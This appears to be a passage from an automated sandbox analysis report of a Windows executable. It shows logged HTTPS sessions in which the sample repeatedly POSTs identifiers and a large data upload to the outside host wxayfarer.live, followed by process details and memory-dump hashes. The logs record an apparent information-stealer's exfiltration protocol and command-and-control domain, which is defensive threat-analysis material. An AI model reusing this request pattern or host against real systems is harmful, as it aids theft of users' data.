server-timing: cfL4;desc="?proto=TCP&rtt=106339&min_rtt=103016&rtt_var=24972&sent=17&recv=24&lost=0&retrans=0&sent_bytes=2831&recv_bytes=20524&delivery_rate=36002&cwnd=228&unsent_bytes=0&cid=c9e4d3c012b94240&ts=566&x=0"
2025-03-25 13:59:21 UTC | 74 | IN | Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d 7d 0d 0a
Data Ascii: 44{"success":{"message":"message success delivery from 161.77.13.20"}}
2025-03-25 13:59:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.449725104.21.80.14437588C:\Users\user\Desktop\ASIr1Bo2x9.exe
                                                TimestampBytes transferredDirectionData
                                                2025-03-25 13:59:23 UTC273OUTPOST /ALosnz HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: multipart/form-data; boundary=Mb46dE8tQ
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                Content-Length: 8733
                                                Host: wxayfarer.live
                                                2025-03-25 13:59:23 UTC | 8733 bytes | OUT | Data Ascii:
                                                --Mb46dE8tQ
                                                Content-Disposition: form-data; name="uid"

                                                40c04cee7c98609d5d30cf00b8ed5f451bfbdd6247
                                                --Mb46dE8tQ
                                                Content-Disposition: form-data; name="pid"

                                                2
                                                --Mb46dE8tQ
                                                Content-Disposition: form-data; name="hwid"

                                                CAD350E94A39DFB738015E30E5E458
                                                2025-03-25 13:59:23 UTC | 818 bytes | IN | HTTP/1.1 200 OK
                                                Date: Tue, 25 Mar 2025 13:59:23 GMT
                                                Content-Type: application/json
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MDMouc7MeUkiAOR0gOj6W9AYwItDniosRooNGxgs6YBYMd%2FeEHNUk6t5tS%2FXjBl5VfY9Uu0wf%2F%2Bp9U0Q7sYXDC7A9%2BPTUYmeOVbXfkSYM%2BoWjhjOlvlWovGe2w8w8%2Bghhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 925eedb23cd5cb3a-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=103901&min_rtt=103686&rtt_var=22084&sent=9&recv=16&lost=0&retrans=2&sent_bytes=2832&recv_bytes=9664&delivery_rate=35927&cwnd=233&unsent_bytes=0&cid=469095302ba09a88&ts=647&x=0"
                                                2025-03-25 13:59:23 UTC | 74 bytes | IN | Data Ascii:
                                                44
                                                {"success":{"message":"message success delivery from 161.77.13.20"}}
                                                2025-03-25 13:59:23 UTC | 5 bytes | IN | Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                3 | 192.168.2.4 | 49726 | 104.21.80.144 | 443 | 7588 | C:\Users\user\Desktop\ASIr1Bo2x9.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2025-03-25 13:59:24 UTC | 279 bytes | OUT | POST /ALosnz HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: multipart/form-data; boundary=QzbfvKAlxzljv2
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                Content-Length: 20411
                                                Host: wxayfarer.live
                                                2025-03-25 13:59:24 UTC | 15331 bytes | OUT | Data Ascii:
                                                --QzbfvKAlxzljv2
                                                Content-Disposition: form-data; name="uid"

                                                40c04cee7c98609d5d30cf00b8ed5f451bfbdd6247
                                                --QzbfvKAlxzljv2
                                                Content-Disposition: form-data; name="pid"

                                                3
                                                --QzbfvKAlxzljv2
                                                Content-Disposition: form-data; name="hwid"

                                                CAD350E94A39DFB
                                                2025-03-25 13:59:25 UTC | 808 bytes | IN | HTTP/1.1 200 OK
                                                Date: Tue, 25 Mar 2025 13:59:25 GMT
                                                Content-Type: application/json
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LOOaRkOHYtqRX0tunTwq5AfXF004dw9H7VaZGeqgaOQ1b97latgeiT8aU8ResyDrrWgT9dktle61sxj2zvyU%2BZrOPcLyyFyOjxP3pWS2bxbHwMqRl2z55PnMgCpC3SV0lg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 925eedbaf8d142a1-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=106342&min_rtt=103842&rtt_var=24259&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21370&delivery_rate=35731&cwnd=244&unsent_bytes=0&cid=64abfc9d2c4e47fd&ts=606&x=0"
                                                2025-03-25 13:59:25 UTC | 74 bytes | IN | Data Ascii:
                                                44
                                                {"success":{"message":"message success delivery from 161.77.13.20"}}
                                                2025-03-25 13:59:25 UTC | 5 bytes | IN | Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                4 | 192.168.2.4 | 49727 | 104.21.80.144 | 443 | 7588 | C:\Users\user\Desktop\ASIr1Bo2x9.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2025-03-25 13:59:27 UTC | 276 bytes | OUT | POST /ALosnz HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: multipart/form-data; boundary=vAU7SSh5bM0f
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                Content-Length: 2322
                                                Host: wxayfarer.live
                                                2025-03-25 13:59:27 UTC | 2322 bytes | OUT | Data Ascii:
                                                --vAU7SSh5bM0f
                                                Content-Disposition: form-data; name="uid"

                                                40c04cee7c98609d5d30cf00b8ed5f451bfbdd6247
                                                --vAU7SSh5bM0f
                                                Content-Disposition: form-data; name="pid"

                                                1
                                                --vAU7SSh5bM0f
                                                Content-Disposition: form-data; name="hwid"

                                                CAD350E94A39DFB738015
                                                2025-03-25 13:59:27 UTC | 808 bytes | IN | HTTP/1.1 200 OK
                                                Date: Tue, 25 Mar 2025 13:59:27 GMT
                                                Content-Type: application/json
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ITgd1fZJamcescMZ3lKMZ77V59fnBvOadPQactMxMWutONjHWzNqqtKXVfLUoYTCSM05hMBxb%2BQ4m1cnv1ao3e1dnMvhwzpBH4adSlgwyv0sgd2L5M0j%2BpaMFUS31ziLAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 925eedcaa9c27283-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=101017&min_rtt=100134&rtt_var=22453&sent=7&recv=10&lost=0&retrans=0&sent_bytes=2832&recv_bytes=3234&delivery_rate=36233&cwnd=217&unsent_bytes=0&cid=cc04f1e0fb7c121b&ts=550&x=0"
                                                2025-03-25 13:59:27 UTC | 74 bytes | IN | Data Ascii:
                                                44
                                                {"success":{"message":"message success delivery from 161.77.13.20"}}
                                                2025-03-25 13:59:27 UTC | 5 bytes | IN | Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                5 | 192.168.2.4 | 49728 | 104.21.80.144 | 443 | 7588 | C:\Users\user\Desktop\ASIr1Bo2x9.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2025-03-25 13:59:28 UTC | 282 bytes | OUT | POST /ALosnz HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: multipart/form-data; boundary=Or6Sl54ft9x4ECG6
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                Content-Length: 585900
                                                Host: wxayfarer.live
                                                2025-03-25 13:59:28 UTC | 15331 bytes | OUT | Data Ascii:
                                                --Or6Sl54ft9x4ECG6
                                                Content-Disposition: form-data; name="uid"

                                                40c04cee7c98609d5d30cf00b8ed5f451bfbdd6247
                                                --Or6Sl54ft9x4ECG6
                                                Content-Disposition: form-data; name="pid"

                                                1
                                                --Or6Sl54ft9x4ECG6
                                                Content-Disposition: form-data; name="hwid"

                                                CAD350E94
                                                2025-03-25 13:59:29 UTC | 818 bytes | IN | HTTP/1.1 200 OK
                                                Date: Tue, 25 Mar 2025 13:59:29 GMT
                                                Content-Type: application/json
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qLZ5bWaqh5YqHLCMVZmXk%2FvydpDUWTyDPPRHHtsXhgshjZbCBE940nNXbqgacUooYqqc6pCLmDiwUrPFT1B5UCrXQ3NZlzW0L%2Bk%2BvJt%2FqiiBSROwNdJBieDYo98pJiBjRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 925eedd2eb8e6e53-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=104482&min_rtt=101147&rtt_var=24411&sent=442&recv=482&lost=0&retrans=0&sent_bytes=2832&recv_bytes=588490&delivery_rate=36576&cwnd=226&unsent_bytes=0&cid=26f48d00c18a3355&ts=1573&x=0"


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.4 | 49729 | 104.21.80.144 | 443 | 7588 | C:\Users\user\Desktop\ASIr1Bo2x9.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2025-03-25 13:59:30 UTC | 265 bytes | OUT | POST /ALosnz HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                Content-Length: 89
                                                Host: wxayfarer.live
                                                2025-03-25 13:59:30 UTC | 89 bytes | OUT | Data Ascii: uid=40c04cee7c98609d5d30cf00b8ed5f451bfbdd6247&cid=&hwid=CAD350E94A39DFB738015E30E5E45899
                                                2025-03-25 13:59:30 UTC | 788 bytes | IN | HTTP/1.1 200 OK
                                                Date: Tue, 25 Mar 2025 13:59:30 GMT
                                                Content-Type: application/octet-stream
                                                Content-Length: 104
                                                Connection: close
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GXaP12UzwZnNgXHWt1O1FqJveYgTGxupcEIgt2ABKoY%2Fgl7nXVuStTC0j%2F7bmf1M9PY2FlaYAXKHwz%2F7ypIVAoJIYAwbn62u9M%2FFWmoRb1KIntgRX1P18tBdnzpZ57V9uQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 925eeddf49a44310-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=106543&min_rtt=104369&rtt_var=24242&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=990&delivery_rate=35664&cwnd=251&unsent_bytes=0&cid=72d352efcf435679&ts=655&x=0"



                                                Target ID:0
                                                Start time:09:59:14
                                                Start date:25/03/2025
                                                Path:C:\Users\user\Desktop\ASIr1Bo2x9.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\ASIr1Bo2x9.exe"
                                                Imagebase:0xeb0000
                                                File size:2'990'592 bytes
                                                MD5 hash:F9915DE2E2CA00D8D19A8D021B433926
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Non-executed Functions

                                                Memory Dump Source
                                                • Source File: 00000000.00000003.1408503369.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, Offset: 00D8B000, based on PE: false
                                                • Associated: 00000000.00000003.1384966149.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_d8b000_ASIr1Bo2x9.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2b515647b09e41a4b79c165ba4519df77647a1f7aee0da2cbfee5f44ebed79f3
                                                • Instruction ID: 4f92b00f23a561b0979fc81cfc33e2ad55a6e34262584635c1553f650a7f3c62
                                                • Opcode Fuzzy Hash: 2b515647b09e41a4b79c165ba4519df77647a1f7aee0da2cbfee5f44ebed79f3
                                                • Instruction Fuzzy Hash: 86D1EF6140E3C18FD7535B744EA91847FB0AE2722072E45DBC4C0CF5B3E298495ADB6A
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.1408503369.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_d8b000_ASIr1Bo2x9.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2b515647b09e41a4b79c165ba4519df77647a1f7aee0da2cbfee5f44ebed79f3
                                                • Instruction ID: 4f92b00f23a561b0979fc81cfc33e2ad55a6e34262584635c1553f650a7f3c62
                                                • Opcode Fuzzy Hash: 2b515647b09e41a4b79c165ba4519df77647a1f7aee0da2cbfee5f44ebed79f3
                                                • Instruction Fuzzy Hash: 86D1EF6140E3C18FD7535B744EA91847FB0AE2722072E45DBC4C0CF5B3E298495ADB6A
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.1408503369.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, Offset: 00D8B000, based on PE: false
                                                • Associated: 00000000.00000003.1384966149.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_d8b000_ASIr1Bo2x9.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9d90d8b2f1723a9e80a7905d310729e4c53fadbcd8b161d92ed833009dd7c3e1
                                                • Instruction ID: ee1eb591014b81cdff361483bee348b30b8b9e48469975c269959443550c858e
                                                • Opcode Fuzzy Hash: 9d90d8b2f1723a9e80a7905d310729e4c53fadbcd8b161d92ed833009dd7c3e1
                                                • Instruction Fuzzy Hash: 12B1E06140E3C19FD7534B744A691857FB0AE2722072E45EBC4C0CF4B3E2684D5ADB7A
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.1408503369.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_d8b000_ASIr1Bo2x9.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9d90d8b2f1723a9e80a7905d310729e4c53fadbcd8b161d92ed833009dd7c3e1
                                                • Instruction ID: ee1eb591014b81cdff361483bee348b30b8b9e48469975c269959443550c858e
                                                • Opcode Fuzzy Hash: 9d90d8b2f1723a9e80a7905d310729e4c53fadbcd8b161d92ed833009dd7c3e1
                                                • Instruction Fuzzy Hash: 12B1E06140E3C19FD7534B744A691857FB0AE2722072E45EBC4C0CF4B3E2684D5ADB7A